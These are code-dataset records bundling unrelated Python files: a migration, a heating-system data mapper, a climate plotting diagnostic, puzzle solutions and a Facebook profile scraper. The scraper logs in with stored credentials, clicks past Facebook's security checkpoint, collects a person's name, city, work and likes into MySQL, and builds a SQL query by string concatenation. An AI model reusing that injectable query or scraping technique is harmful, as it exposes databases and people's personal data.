downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'training_task', type_='foreignkey')\n op.drop_column('training_task', 'parent_training_id')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/20180608153911_64ebdc56387f_.py","file_name":"20180608153911_64ebdc56387f_.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"282397514","text":"\"\"\"Mappers from json to model classes.\"\"\"\nfrom datetime import datetime\nfrom typing import Optional, List, Any, Tuple\n\nfrom . import (BoilerStatus, Circulation, Device, HolidayMode, HotWater,\n QuickMode, QuickModes, QuickVeto, Room, TimeProgram,\n TimeProgramDay, TimePeriodSetting, OperatingModes, Error,\n SyncState, SettingModes, SystemInfo, Dhw, OperatingMode, Zone,\n ZoneHeating, ZoneCooling, Report, Ventilation, ActiveFunction)\n\n_DATE_FORMAT = \"%Y-%m-%d\"\n\n\ndef map_quick_mode(full_system) -> Optional[QuickMode]:\n \"\"\"Map *quick mode*.\"\"\"\n if full_system:\n quick_mode = full_system.get(\"body\", dict()) \\\n .get(\"configuration\", dict()).get(\"quickmode\")\n if quick_mode:\n mode = QuickModes.get(quick_mode.get(\"quickmode\"))\n if mode != QuickModes.QUICK_VETO:\n return mode\n return None\n\n\ndef map_outdoor_temp(full_system) -> Optional[float]:\n \"\"\"get *outdoor_temperature*.\"\"\"\n if full_system:\n raw_temp = full_system.get(\"body\", dict()).get(\"status\", dict()) \\\n .get('outside_temperature')\n if raw_temp is not None:\n return float(raw_temp)\n return None\n\n\ndef map_rooms(raw_rooms) -> List[Room]:\n \"\"\"Map *rooms*.\"\"\"\n rooms: List[Room] = []\n if raw_rooms:\n for raw_room in raw_rooms.get(\"body\", dict()).get(\"rooms\", list()):\n room = map_room(raw_room)\n if room:\n rooms.append(room)\n\n return rooms\n\n\ndef map_room(raw_room) -> Optional[Room]:\n \"\"\"Map *room*.\"\"\"\n if raw_room:\n raw_room = raw_room.get(\"body\", raw_room)\n\n if raw_room:\n config = raw_room.get(\"configuration\", dict())\n\n func = _map_function(raw_room)\n\n room_id = raw_room.get(\"roomIndex\")\n child_lock = config.get(\"childLock\")\n current_temp = config.get(\"currentTemperature\")\n devices = map_devices(config.get(\"devices\"))\n window_open = config.get(\"isWindowOpen\")\n name = config.get(\"name\")\n humidity = config.get('currentHumidity')\n\n raw_quick_veto = config.get(\"quickVeto\")\n quick_veto = None\n if raw_quick_veto:\n quick_veto = QuickVeto(\n raw_quick_veto.get(\"remainingDuration\"),\n config.get(\"temperatureSetpoint\"))\n\n return Room(id=room_id,\n name=name,\n time_program=func[0],\n temperature=current_temp,\n target_high=func[2],\n operating_mode=func[1],\n quick_veto=quick_veto,\n child_lock=child_lock,\n window_open=window_open,\n devices=devices,\n humidity=humidity)\n return None\n\n\ndef map_devices(raw_devices) -> List[Device]:\n \"\"\"Map *devices* of a room.\"\"\"\n devices = []\n if raw_devices:\n for raw_device in raw_devices:\n name = raw_device.get(\"name\")\n device_type = raw_device.get(\"deviceType\")\n battery_low = raw_device.get(\"isBatteryLow\")\n radio_out_of_reach = raw_device.get(\"isRadioOutOfReach\")\n sgtin = raw_device.get(\"sgtin\")\n devices.append(\n Device(name, sgtin, device_type, battery_low,\n radio_out_of_reach))\n\n return devices\n\n\ndef map_time_program(raw_time_program, key: Optional[str] = None) \\\n -> TimeProgram:\n \"\"\"Map *time program*.\"\"\"\n result = {}\n if raw_time_program:\n result[\"monday\"] = map_time_program_day(\n raw_time_program.get(\"monday\"), key)\n result[\"tuesday\"] = map_time_program_day(\n raw_time_program.get(\"tuesday\"), key)\n result[\"wednesday\"] = map_time_program_day(\n raw_time_program.get(\"wednesday\"), key)\n result[\"thursday\"] = map_time_program_day(\n raw_time_program.get(\"thursday\"), key)\n result[\"friday\"] = map_time_program_day(\n raw_time_program.get(\"friday\"), key)\n result[\"saturday\"] = map_time_program_day(\n raw_time_program.get(\"saturday\"), key)\n result[\"sunday\"] = map_time_program_day(\n raw_time_program.get(\"sunday\"), key)\n\n return TimeProgram(result)\n\n\ndef map_time_program_day(raw_time_program_day, key: Optional[str] = None) \\\n -> TimeProgramDay:\n \"\"\"Map *time program day* and *time program day settings*.\"\"\"\n settings = []\n if raw_time_program_day:\n for time_setting in raw_time_program_day:\n start_time = time_setting.get(\"startTime\")\n target_temp = time_setting.get(\"temperatureSetpoint\")\n\n mode = None\n if key:\n mode = SettingModes.get(time_setting.get(key))\n\n settings.append(\n TimePeriodSetting(start_time, target_temp, mode))\n\n return TimeProgramDay(settings)\n\n\ndef map_holiday_mode(full_system) -> HolidayMode:\n \"\"\"Map *holiday mode*.\"\"\"\n mode = HolidayMode(False)\n if full_system:\n raw_holiday_mode = full_system.get(\"body\", dict()) \\\n .get(\"configuration\", dict()).get(\"holidaymode\")\n\n if raw_holiday_mode:\n mode.is_active = bool(raw_holiday_mode.get(\"active\"))\n mode.target = float(raw_holiday_mode\n .get(\"temperature_setpoint\"))\n mode.start_date = datetime.strptime(\n raw_holiday_mode.get(\"start_date\"), _DATE_FORMAT).date()\n mode.end_date = datetime.strptime(\n raw_holiday_mode.get(\"end_date\"), _DATE_FORMAT).date()\n\n return mode\n\n\ndef map_boiler_status(hvac_state) -> Optional[BoilerStatus]:\n \"\"\"Map *boiler status.\"\"\"\n if hvac_state:\n hvac_state_info = _find_hvac_message_status(hvac_state)\n if hvac_state_info:\n last_update = _datetime_mandatory(hvac_state_info.get(\"timestamp\"))\n device_name = str(hvac_state_info.get(\"deviceName\"))\n code = str(hvac_state_info.get(\"statusCode\"))\n title = str(hvac_state_info.get(\"title\"))\n description = str(hvac_state_info.get(\"description\"))\n hint = str(hvac_state_info.get(\"hint\"))\n return BoilerStatus(device_name, title, code, description,\n last_update, hint)\n\n return None\n\n\ndef _map_status(hvac_state) -> Tuple[str, str]:\n \"\"\"Map *system status*.\"\"\"\n meta = hvac_state.get('meta', dict())\n online = meta.get('onlineStatus', dict()).get('status')\n update = meta.get('firmwareUpdateStatus', dict()).get('status')\n return online, update\n\n\ndef map_system_info(facilities, gateway, hvac, serial) -> SystemInfo:\n \"\"\"Map *system info*.\"\"\"\n if serial is None:\n serial = map_serial_number(facilities)\n\n facilities_list = facilities.get(\n \"body\", dict()).get(\"facilitiesList\", list())\n facility = [facility for facility in\n facilities_list if facility.get('serialNumber') == serial][0]\n\n name = facility.get(\"name\", None)\n mac_ethernet = facility.get(\"networkInformation\", dict()) \\\n .get(\"macAddressEthernet\")\n mac_wifi = facility.get(\"networkInformation\", dict()) \\\n .get(\"macAddressWifiAccessPoint\")\n firmware = facility.get(\"firmwareVersion\", None)\n gateway = gateway.get(\"body\", dict()).get(\"gatewayType\", None)\n\n online, update = _map_status(hvac)\n\n return SystemInfo(gateway, serial, name, mac_ethernet, mac_wifi, firmware,\n online, update)\n\n\ndef map_zones(full_system) -> List[Zone]:\n \"\"\"Map *zones*.\"\"\"\n zones = []\n if full_system:\n for raw_zone in full_system.get(\"body\", dict()).get(\"zones\", list()):\n zone = map_zone(raw_zone)\n if zone:\n zones.append(zone)\n\n return zones\n\n\ndef map_zone(raw_zone) -> Optional[Zone]:\n \"\"\"Map *zones*.\"\"\"\n raw_zone_body = raw_zone.get(\"body\")\n\n if raw_zone_body:\n raw_zone = raw_zone_body\n\n if raw_zone:\n zone_id = raw_zone.get(\"_id\")\n configuration = raw_zone.get(\"configuration\", dict())\n name = configuration.get(\"name\", \"\").strip()\n temperature = configuration.get(\"inside_temperature\")\n active_function = ActiveFunction[\n configuration.get(\"active_function\", ActiveFunction.STANDBY.name)]\n quick_veto = _map_quick_veto_zone(configuration.get(\"quick_veto\"))\n rbr = raw_zone.get(\"currently_controlled_by\", dict())\\\n .get(\"name\", \"\") == \"RBR\"\n\n raw_heating = raw_zone.get(\"heating\", dict())\n raw_cooling = raw_zone.get(\"cooling\", dict())\n enabled = configuration.get(\"enabled\", bool())\n\n zone_cooling = None\n func = _map_function(raw_heating, \"setting\")\n zone_heating = ZoneHeating(func[0], func[1], func[2], func[3])\n\n if raw_cooling:\n func = _map_function(raw_cooling, \"setting\")\n zone_cooling = ZoneCooling(func[0], func[1], func[2], func[3])\n\n return Zone(id=zone_id, name=name, # type: ignore\n temperature=temperature,\n quick_veto=quick_veto, active_function=active_function,\n rbr=rbr, heating=zone_heating, cooling=zone_cooling,\n enabled=enabled)\n return None\n\n\ndef map_ventilation(system) -> Optional[Ventilation]:\n \"\"\"Maps *ventilation*.\"\"\"\n ventilation = None\n if system:\n fans = system.get('body', dict()).get('ventilation', list())\n if fans:\n func = _map_function(fans[0].get('fan', dict()), 'setting')\n fan_id = fans[0].get(\"_id\")\n ventilation = Ventilation(id=fan_id, name='Ventilation',\n time_program=func[0],\n operating_mode=func[1],\n target_high=func[2], target_low=func[3])\n\n return ventilation\n\n\ndef _map_function(\n raw,\n tp_key=None) -> Tuple[TimeProgram, OperatingMode, float, float]:\n conf = raw.get(\"configuration\", dict())\n mode = conf.get('mode')\n if not mode:\n mode = conf.get('operation_mode')\n if not mode:\n mode = conf.get('operationMode')\n\n operating_mode = OperatingModes.get(mode)\n target_high = conf.get(\"setpoint_temperature\", None)\n if not target_high:\n target_high = conf.get(\"temperature_setpoint\", None)\n if not target_high:\n target_high = conf.get(\"temperatureSetpoint\", None)\n if not target_high:\n target_high = conf.get(\"day_level\", None)\n\n target_low = conf.get(\"setback_temperature\", None)\n if not target_low:\n target_low = conf.get(\"night_level\", None)\n time_program = map_time_program(raw.get(\"timeprogram\"), tp_key)\n\n return time_program, operating_mode, target_high, target_low\n\n\ndef map_hot_water(full_system, live_report) -> Optional[HotWater]:\n \"\"\"Map *hot water*.\"\"\"\n hot_water_list = None\n if full_system:\n hot_water_list = full_system.get(\"body\", dict()).get(\"dhw\")\n\n if hot_water_list:\n raw_hot_water = hot_water_list[0].get(\"hotwater\")\n dwh_id = hot_water_list[0].get(\"_id\")\n\n if raw_hot_water:\n return _map_hot_water(raw_hot_water, dwh_id, live_report)\n\n return None\n\n\ndef map_hot_water_alone(raw_hot_water, dhw_id: str, live_report) \\\n -> Optional[HotWater]:\n \"\"\"Map *hot water*.\"\"\"\n if raw_hot_water:\n raw_hot_water_body = raw_hot_water.get(\"body\", dict())\n return _map_hot_water(raw_hot_water_body, dhw_id, live_report)\n return None\n\n\ndef map_dhw(full_system, live_report) -> Dhw:\n \"\"\"Map *dhw*.\"\"\"\n circulation = map_circulation(full_system)\n hotwater = map_hot_water(full_system, live_report)\n return Dhw(hotwater=hotwater, circulation=circulation)\n\n\ndef map_circulation(full_system) -> Optional[Circulation]:\n \"\"\"Map *circulation*.\"\"\"\n if full_system:\n hot_water_list = full_system.get(\"body\", dict()).get(\"dhw\", list())\n\n if hot_water_list:\n raw_circulation = hot_water_list[0].get(\"circulation\")\n dhw_id = hot_water_list[0].get(\"_id\")\n\n if raw_circulation:\n return _map_circulation(raw_circulation, dhw_id)\n return None\n\n\ndef map_circulation_alone(raw_circulation, dhw_id: str) \\\n -> Optional[Circulation]:\n \"\"\"Map *circulation*.\"\"\"\n if raw_circulation:\n raw_circulation_body = raw_circulation.get(\"body\", dict())\n return _map_circulation(raw_circulation_body, dhw_id)\n return None\n\n\ndef map_errors(hvac_state) -> List[Error]:\n \"\"\"Map *errors*.\"\"\"\n errors = []\n for error in hvac_state.get(\"body\", dict()).get(\"errorMessages\",\n list()):\n if error.get(\"type\") == \"ERROR\":\n errors.append(Error(error.get('deviceName'),\n error.get('title'),\n error.get('statusCode'),\n error.get('description'),\n _datetime_mandatory(error.get('timestamp'))))\n return errors\n\n\ndef map_hvac_sync_state(hvac_state) -> Optional[SyncState]:\n \"\"\"Map sync state.\"\"\"\n if hvac_state:\n states = hvac_state.get('meta', dict()).get('syncState', list())\n if states:\n return _map_state(states[0])\n return None\n\n\ndef map_serial_number(facilities) -> str:\n \"\"\"Map serial number.\"\"\"\n facility = facilities.get(\"body\", dict()).get(\"facilitiesList\", list())[0]\n return str(facility.get(\"serialNumber\", None))\n\n\ndef _map_state(raw_state) -> Optional[SyncState]:\n state = str(raw_state.get('state'))\n timestamp = _datetime_mandatory(raw_state.get('timestamp'))\n link = raw_state.get('link', dict()).get('resourceLink')\n return SyncState(state, timestamp, link)\n\n\ndef map_reports(live_report) -> List[Report]:\n \"\"\"Maps *Reports*.\"\"\"\n reports = []\n\n if live_report:\n for device in live_report.get(\"body\", dict()).get(\"devices\", list()):\n device_id = device.get(\"_id\")\n device_name = device.get(\"name\")\n\n for report in device.get(\"reports\", list()):\n report_id = report.get(\"_id\")\n name = report.get(\"name\")\n value = report.get(\"value\")\n unit = report.get(\"unit\")\n report = Report(id=report_id, value=value, name=name,\n unit=unit, device_id=device_id,\n device_name=device_name)\n reports.append(report)\n\n return reports\n\n\ndef _map_hot_water(raw_hot_water, dhw_id: str, report) -> Optional[HotWater]:\n func = _map_function(raw_hot_water, \"mode\")\n\n current_temp = None\n\n if report:\n dhw_report = _find_dhw_temperature_report(report)\n if dhw_report:\n current_temp = dhw_report.get(\"value\")\n\n return HotWater(id=dhw_id,\n name='hotwater',\n time_program=func[0],\n temperature=current_temp,\n target_high=func[2],\n operating_mode=func[1])\n\n\ndef _map_circulation(raw_circulation, dhw_id: str) -> Circulation:\n func = _map_function(raw_circulation, \"setting\")\n\n return Circulation(id=dhw_id,\n name='Circulation',\n time_program=func[0],\n operating_mode=func[1])\n\n\ndef _find_hvac_message_status(hvac_state) -> Optional[Any]:\n for message in hvac_state.get(\"body\", dict()).get(\"errorMessages\", list()):\n if message.get(\"type\") == \"STATUS\":\n return message\n return None\n\n\ndef _find_dhw_temperature_report(live_report) -> Optional[Any]:\n for device in live_report.get(\"body\", dict()).get(\"devices\", list()):\n for report in device.get(\"reports\", list()):\n if report.get(\"associated_device_function\") == \"DHW\" \\\n and report.get(\"_id\") == \\\n \"DomesticHotWaterTankTemperature\":\n return report\n return None\n\n\ndef _map_quick_veto_zone(raw_quick_veto) -> Optional[QuickVeto]:\n if raw_quick_veto and raw_quick_veto.get(\"active\"):\n # No way to find start_date, Quick veto on zone lasts 6 hours\n return QuickVeto(target=raw_quick_veto.get(\"setpoint_temperature\"))\n return None\n\n\ndef _datetime(timestamp: Optional[int]) -> Optional[datetime]:\n if timestamp:\n return datetime.fromtimestamp(timestamp / 1000)\n return None\n\n\ndef _datetime_mandatory(timestamp: int) -> datetime:\n return datetime.fromtimestamp(timestamp / 1000)\n","sub_path":"pymultimatic/model/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":16744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"646544308","text":"import nibabel as nib\nimport os\nimport numpy as np\n\n\ndef normalize_0_1(array):\n \"\"\"\" Normalize all values in the array between 0 and 1 \"\"\"\n return (array - array.min()) / (array.max() - array.min())\n\n\ndef load_volume(data_path, mask=True):\n imgs = nib.load(data_path)\n imgs_array = imgs.get_fdata()\n\n if not mask:\n imgs_array = normalize_0_1(imgs_array)\n return imgs_array\n\n\nif __name__ == '__main__':\n\n for file in os.listdir('rp_im'):\n volume_path = os.path.join('rp_im', file)\n lung_mask_path = os.path.join('rp_lung_msk', file)\n msk_path = os.path.join('rp_msk', file)\n\n volumes = load_volume(volume_path)\n lung_mask = load_volume(lung_mask_path, mask=True)\n mask = load_volume(msk_path, mask=True)\n\n print(volumes.shape)\n print(lung_mask.shape)\n print(mask.shape)\n print()\n","sub_path":"CT/3D segmentation/data/explore_data.py","file_name":"explore_data.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"55126297","text":"# Calculate anomalies, and then plot our model groups in a boxplot\n\nfrom esmvaltool.diag_scripts.shared import (\n run_diagnostic,\n group_metadata,\n select_metadata,\n extract_variables,\n)\n\nimport iris\nimport iris.quickplot as qplt\nimport cartopy\nimport cartopy.crs as ccrs\n\nimport os\nimport logging\n\nimport matplotlib.pyplot as plt\n\nlogger = logging.getLogger(os.path.basename(__file__))\n\n\ndef process_projections_dict(proj_dict, season):\n # recursive function to pull out data from dictionary\n out_data = {}\n for k, v in proj_dict.items():\n if isinstance(v, dict):\n vals = process_projections_dict(v, season)\n for k1, v1 in vals.items():\n out_data[f\"{k} {k1}\"] = v1\n else:\n if v is None:\n continue\n # extract required season\n season_con = iris.Constraint(season_number=season)\n data = v.extract(season_con)\n # if the result is a scalar cube, just store the value\n # else store the whole cube\n if data.ndim == 1:\n out_data[k] = data.data.item()\n else:\n out_data[k] = data\n return out_data\n\n\ndef get_anomalies(ds_list, base_clim_start, fut_clim_start, relative=False):\n # construct baseline\n base_metadata = select_metadata(ds_list, start_year=base_clim_start)\n if base_metadata == []:\n logging.warning(f\"Base climatology (start {base_clim_start}) not found\")\n return None\n base_file = base_metadata[0][\"filename\"]\n base_cube = iris.load_cube(base_file)\n\n # get future\n fut_metadata = select_metadata(ds_list, start_year=fut_clim_start)\n if fut_metadata == []:\n logging.warning(f\"Future climatology (start {fut_clim_start}) not found\")\n return None\n fut_file = fut_metadata[0][\"filename\"]\n fut_cube = iris.load_cube(fut_file)\n\n if relative:\n diff = fut_cube - base_cube\n anomaly = (diff / base_cube) * 100\n anomaly.units = \"%\"\n else:\n anomaly = fut_cube - base_cube\n\n return anomaly\n\n\ndef main(cfg):\n # The config object is a dict of all the metadata from the pre-processor\n\n # get variable processed\n var = list(extract_variables(cfg).keys())\n assert len(var) == 1\n var = var[0]\n\n if var == \"pr\":\n rel_change = True\n else:\n rel_change = False\n\n # establish the time periods of our datasets\n start_years = list(group_metadata(cfg[\"input_data\"].values(), \"start_year\"))\n base_start = min(start_years)\n fut_start = max(start_years)\n\n # first group datasets by project..\n # this creates a dict of datasets keyed by project (CMIP5, CMIP6 etc.)\n projects = group_metadata(cfg[\"input_data\"].values(), \"project\")\n # how to uniquely define a dataset varies by project, for CMIP it's simple, just dataset...\n # for CORDEX, combo of dataset and driver (and possibly also domain if we start adding those)\n # also gets more complex if we start adding in different ensembles..\n\n # This section of the code loads and organises the data to be ready for plotting\n logger.info(\"Loading data\")\n # empty dict to store results\n projections = {}\n model_lists = {}\n cordex_drivers = []\n # loop over projects\n for proj in projects:\n # we now have a list of all the data entries..\n # for CMIPs we can just group metadata again by dataset then work with that..\n models = group_metadata(projects[proj], \"dataset\")\n\n # empty dict for results\n projections[proj] = {}\n # loop over the models\n for m in models:\n if proj[:6].upper() == \"CORDEX\":\n # then we need to go one deeper in the dictionary to deal with driving models\n drivers = group_metadata(models[m], \"driver\")\n projections[proj][m] = dict.fromkeys(drivers.keys())\n for d in drivers:\n logging.info(f\"Calculating anomalies for {proj} {m} {d}\")\n anoms = get_anomalies(drivers[d], base_start, fut_start, rel_change)\n if anoms is None:\n continue\n projections[proj][m][d] = anoms\n if proj not in model_lists:\n model_lists[proj] = []\n model_lists[proj].append(f\"{m} {d}\")\n cordex_drivers.append(d)\n elif proj == \"UKCP18\":\n # go deeper to deal with ensembles and datasets\n # split UKCP into seperate GCM and RCM\n proj_key = f\"UKCP18 {m}\"\n ensembles = group_metadata(models[m], \"ensemble\")\n projections[proj_key] = dict.fromkeys(ensembles.keys())\n for ens in ensembles:\n logging.info(f\"Calculating anomalies for {proj_key} {ens}\")\n anoms = get_anomalies(\n ensembles[ens], base_start, fut_start, rel_change\n )\n if anoms is None:\n continue\n projections[proj_key][ens] = anoms\n if proj_key not in model_lists:\n model_lists[proj_key] = []\n model_lists[proj_key].append(f\"{proj_key} {ens}\")\n else:\n logging.info(f\"Calculating anomalies for {proj} {m}\")\n anoms = get_anomalies(models[m], base_start, fut_start, rel_change)\n if anoms is None:\n continue\n projections[proj][m] = anoms\n if proj not in model_lists:\n model_lists[proj] = []\n model_lists[proj].append(f\"{m}\")\n # remove any empty categories (i.e. UKCP18 which has been split into rcm and gcm)\n if projections[proj] == {}:\n del projections[proj]\n cordex_drivers = set(cordex_drivers)\n\n # this section of the code does the plotting..\n # we now have all the projections in the projections dictionary\n\n # now lets plot them\n # first we need to process the dictionary, and move the data into a list of vectors\n # the projections object is the key one that contains all our data..\n seasons = {0: \"DJF\", 1: \"MAM\", 2: \"JJA\", 3: \"OND\"}\n logger.info(\"Plotting\")\n extent = (\n cfg[\"domain\"][\"start_longitude\"] - 2,\n cfg[\"domain\"][\"end_longitude\"] + 2,\n cfg[\"domain\"][\"start_latitude\"] - 2,\n cfg[\"domain\"][\"end_latitude\"] + 2,\n )\n for s in seasons.keys():\n # make directory\n try:\n os.mkdir(f\"{cfg['plot_dir']}/{seasons[s]}\")\n except FileExistsError:\n pass\n for p in projections:\n pdata = process_projections_dict(projections[p], s)\n\n for m in pdata:\n title = f\"{p} {m} {seasons[s]} {var} change\"\n plt.figure(figsize=(12.8, 9.6))\n ax = plt.axes(projection=ccrs.PlateCarree())\n ax.set_extent(extent)\n # set scales\n if var == \"pr\":\n vmn = -50\n vmx = 50\n cmap = \"brewer_RdYlBu_11\"\n else:\n vmn = 0\n vmx = 5\n cmap = \"brewer_YlOrRd_09\"\n qplt.pcolormesh(pdata[m], vmin=vmn, vmax=vmx, cmap=cmap)\n plt.title(title)\n ax.coastlines()\n ax.add_feature(cartopy.feature.BORDERS, linestyle=\":\")\n plt.savefig(\n f\"{cfg['plot_dir']}/{seasons[s]}/{p}_{m}_map_{seasons[s]}.png\"\n )\n plt.close()\n\n # print all datasets used\n print(\"Input models for plots:\")\n for p in model_lists.keys():\n print(f\"{p}: {len(model_lists[p])} models\")\n print(model_lists[p])\n print(\"\")\n\n\nif __name__ == \"__main__\":\n with run_diagnostic() as cfg:\n main(cfg)\n","sub_path":"esmvaltool/diagnostics/spatial_plot.py","file_name":"spatial_plot.py","file_ext":"py","file_size_in_byte":7948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"377940259","text":"import mysql.connector\nimport requests\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport email_pass\nfrom selenium.webdriver.common.by import By\nimport time\nimport json\n\n\nmydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=email_pass.mysql,\n database=\"python_assignment\",\n auth_plugin=\"mysql_native_password\"\n)\n\nclass Person:\n def __init__(self, name, city=\"Roorkee\", work=None):\n self.name=name\n self.city=city\n if work is not None:\n self.work=work\n\n def show(self):\n print('My name is {} and my current city is {}'.format(self.name, self.city))\n\n def upload(self, username):\n mycursor = mydb.cursor()\n\n mycursor.execute(\"UPDATE user SET name=%s,work=%s,city=%s WHERE username=%s\", (str(self.name), json.dumps(self.work), str(self.city), username))\n\n mydb.commit()\n return \"uploaded\"\n \n\ndef check(myresult):\n for x in myresult:\n if(x[1] is not None):\n if(x[2] is not None):\n if(x[3] is not None):\n return Person(name=x[1], city= x[2], work=json.loads(x[3]))\n else:\n return Person(name=x[1], city= x[2])\n else:\n if(x[3] is not None):\n return Person(name=x[1], work=json.loads(x[3]))\n else:\n return Person(name=x[1])\n\n else:\n return None\n\ndef validate(func):\n def inner(username):\n mycursor = mydb.cursor()\n mycursor.execute(\"SELECT * FROM user where username=\\'\"+username+\"\\'\")\n\n myresult = mycursor.fetchall()\n found=False\n for x in myresult:\n found=True\n\n if(found==False):\n raise ValueError('username is not valid!')\n else:\n previous= check(myresult)\n if(previous is not None):\n previous.show()\n else:\n func(username)\n\n return \"Task completed!\"\n\n return inner\n\n\n@validate\ndef scrap(username):\n\n URL= \"https://m.facebook.com/\"+username+\"/about\"\n r = requests.get(URL)\n \n soup = BeautifulSoup(r.content, 'html5lib') \n\n work= find_work(username, soup)\n name= find_name(username, soup)\n city=find_city(username, soup)\n find_fav(username)\n\n person= Person(name, city, work)\n\n person.show()\n\n person.upload(username)\n \n\ndef find_work(username, soup):\n\n for link in soup.find_all('div'):\n if link.string==\"कार्य\":\n break\n link=link.parent.parent.parent.parent.parent.parent.contents[1]\n work=[]\n for div in link.children:\n work.append(div.contents[0].contents[1].contents[0].contents[0].contents[0].string)\n return work\n\n\ndef find_name(username, soup):\n \n div= soup.find('h3')\n name= div.string\n\n return name\n\n\ndef find_city(username, soup):\n\n for link in soup.find_all('div'):\n if link.string==\"वर्तमान शहर\":\n break\n\n city=link.parent.parent.contents[1].contents[0].contents[0].string\n return city\n\ndef find_fav(username):\n\n driver = webdriver.Chrome() \n driver.maximize_window()\n time.sleep(2)\n\n driver.get(\"https://m.facebook.com/\"+username+\"/about\")\n time.sleep(2)\n driver.find_element(By.XPATH, '//*[@id=\"mobile_login_bar\"]/div[2]/a[2]').click()\n\n email = driver.find_element_by_id(\"m_login_email\")\n passwd = driver.find_element_by_id(\"m_login_password\")\n\n email.send_keys(email_pass.user_name)\n passwd.send_keys(email_pass.password)\n\n passwd.send_keys(Keys.RETURN)\n time.sleep(5)\n\n\n driver.find_element(By.XPATH, '//*[@id=\"checkpointSubmitButton-actual-button\"]').click()\n\n time.sleep(2)\n\n radioBtn1= driver.find_element(By.XPATH, '/html/body/div[1]/div/div[3]/form/div/article/section/div/fieldset/label[1]/div/div[2]/div')\n radioBtn1.click()\n\n time.sleep(1)\n\n driver.find_element(By.XPATH, '//*[@id=\"checkpointSubmitButton-actual-button\"]').click()\n\n time.sleep(5)\n\n driver.find_element(By.XPATH, '/html/body/div[1]/div/div[3]/form/div/article/section/div/div[2]/div/div[1]/div[2]/fieldset/label[25]/div/div[1]').click()\n\n time.sleep(1)\n\n driver.find_element(By.XPATH, '/html/body/div[1]/div/div[3]/form/div/article/section/div/div[2]/div/div[2]/div[2]/fieldset/label[11]/div/div[1]').click()\n\n time.sleep(1)\n\n driver.find_element(By.XPATH, '/html/body/div[1]/div/div[3]/form/div/article/section/div/div[2]/div/div[3]/div[2]/fieldset/label[7]/div/div[1]').click()\n\n time.sleep(3)\n\n driver.find_element(By.XPATH, '//*[@id=\"checkpointSubmitButton-actual-button\"]').click()\n\n time.sleep(3)\n\n driver.find_element(By.XPATH, '//*[@id=\"checkpointSubmitButton-actual-button\"]').click()\n\n time.sleep(3)\n\n SCROLL_PAUSE_TIME = 2\n\n# Get scroll height\n last_height = driver.execute_script(\"return document.body.scrollHeight\")\n\n while True:\n # Scroll down to bottom\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\n # Wait to load page\n time.sleep(SCROLL_PAUSE_TIME)\n\n # Calculate new scroll height and compare with last scroll height\n new_height = driver.execute_script(\"return document.body.scrollHeight\")\n if new_height == last_height:\n break\n last_height = new_height\n\n time.sleep(2)\n\n driver.find_element(By.XPATH, \"//div[contains(text(),'Likes')]/../../div[3]/a\").click()\n\n time.sleep(3)\n\n driver.find_element(By.XPATH, '//*[@id=\"timelineBody\"]/div/div/div/div[1]/div/header/div/div[3]/a').click()\n\n time.sleep(3)\n\n\n fav =[]\n\n for span in driver.find_elements(By.XPATH, '/html/body/div[1]/div[1]/div[4]/div/div/div/div/div/div/div/div/div[1]/div[*]/div/span'):\n fav.append(span.text)\n\n for span in driver.find_elements(By.XPATH, '/html/body/div[1]/div[1]/div[4]/div/div/div/div/div/div/div/div/div[2]/div[*]/div/span'):\n fav.append(span.text)\n\n print(\"here's the list of my favourites: \")\n print(fav)\n print()\n\n driver.quit()\n\n\n# usname=\"anshul.d.sharma.7\"\n# scrap(usname)","sub_path":"task3/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":6171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"405847425","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nfrom itertools import combinations as cm\nimport math\n\ndef main():\n n = int(input())\n data = [list(map(int,input().split())) for _ in range(n)]\n\n min_ans = 123456789\n\n for case in cm(range(1,n+1),n//2):\n s1 = s2 = 0\n\n for i in case:\n for j in case:\n s1+=data[i-1][j-1]\n\n res = set(range(1, n + 1)) - set(case)\n for i in res:\n for j in res:\n s2 += data[i-1][j-1]\n\n min_ans=min([min_ans,abs(s1-s2)])\n\n print(min_ans)\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"Python/SEOKCHAN/백트랙킹/8.스타트와링크.py","file_name":"8.스타트와링크.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"636852227","text":"# BSD 3-Clause License\n\n# Copyright (c) 2016, Rob Haverkamp\n# All rights reserved.\n\nimport yaml\nfrom bob.errors import BobError\n\ndef parse(file):\n try:\n with open(file) as stream:\n config = yaml.load(stream)\n except OSError:\n raise BobError(\"Can not open yaml file\")\n return config\n","sub_path":"bob/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"613830364","text":"class Solution:\n def minMeetingRooms(self, intervals: List[List[int]]) -> int:\n if not intervals:\n return 0\n result, curr = 0, 0\n for i, val in sorted(\n x for interval in intervals for x in [(interval[0], 1), (interval[1], -1)]\n ):\n curr += val\n result = max(curr, result)\n return result\n\n\n# import heapq\n#\n#\n# class Solution:\n# def minMeetingRooms(self, intervals: List[List[int]]) -> int:\n# if not intervals: return 0\n# q = []\n# for interval in sorted(intervals, key=lambda x: x[0]):\n# if not q:\n# heapq.heappush(q, interval[1])\n# else:\n# if interval[0] >= q[0]:\n# heapq.heappop(q)\n# heapq.heappush(q, interval[1])\n# return len(q)\n","sub_path":"MY_REPOS/INTERVIEW-PREP-COMPLETE/Leetcode/253.py","file_name":"253.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} 